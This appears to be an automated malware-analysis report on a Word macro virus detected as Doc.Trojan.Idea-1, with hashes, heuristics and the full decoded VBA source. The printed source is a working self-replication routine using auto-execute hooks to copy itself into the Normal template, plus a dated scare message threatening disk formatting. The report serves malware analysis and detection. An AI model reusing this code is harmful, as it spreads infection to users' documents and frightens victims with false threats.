Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f88a1cf914f24a96…

MALICIOUS

Office (OLE)

34.5 KB Created: 1997-09-17 10:18:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 684d1ea9a38452b83a5d8c0f01272098 SHA-1: d81f9b12eb7710c10d2b1885aed11ebe5a0d318e SHA-256: f88a1cf914f24a96b9002af5c69b14a519b18a95adc36e04b00352c1fea86288
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file contains VBA macros, including AutoOpen and Auto_Close, which are commonly used to execute malicious code upon document opening or closing. The script attempts to export and re-import the 'FuckViruZ' macro, likely to evade detection mechanisms. It also contains a hardcoded email address and phone number, suggesting a social engineering or ransomware component.

Heuristics 5

  • ClamAV: Doc.Trojan.Idea-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Idea-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1653 bytes
SHA-256: 10a5a0eb697eebcfade638e90f79d3a916c6b9030eb6a2311503fd0209d62432
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "FuckViruZ"
Sub autoexit()
FuckViruZ
End Sub
Sub AutoOpen()
FuckViruZ
End Sub
Sub AutoClose()
FuckViruZ
End Sub
Private Sub FuckViruZ()
On Error Resume Next
Application.VBE.ActiveVBProject.VBComponents("FuckViruZ").Export "c:\FuckViruZ.sys"
 For i = 1 To NormalTemplate.VBProject.VBComponents.Count

If NormalTemplate.VBProject.VBComponents(i).Name = "FuckViruZ" Then norminstall = True
Next i
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
     If ActiveDocument.VBProject.VBComponents(i).Name = "FuckViruZ" Then activinstall = True
Next i

If activinstall = True And norminstall = False Then Set dobj = NormalTemplate.VBProject _
Else: If activinstall = False And norminstall = True Then Set dobj = ActiveDocument.VBProject
dobj.VBComponents.import ("c:\FuckViruZ.sys")
fecha
End Sub
Private Sub fecha()
If Day(Now()) = 13 Then MsgBox "Este es el MacroViruZ The Fucker..... >:-P jijijijijij si quieres la cura para este MacroViruZ.... jejeje contactate con nosotros.... en :P  FuckSoft producto  The Fucker SuperViruZ... al email BlackViruz@666.hell o al telf. de FuckSoft 666-666-666 llamar antes de que su HHDD sea formateado!!!!!!!!!! si cierra esta ventana su disco duro entrara en el proceso de formateado.         adios y buena suerte...                                                 gracias a hacker antiviruz por la idea :P"
End Sub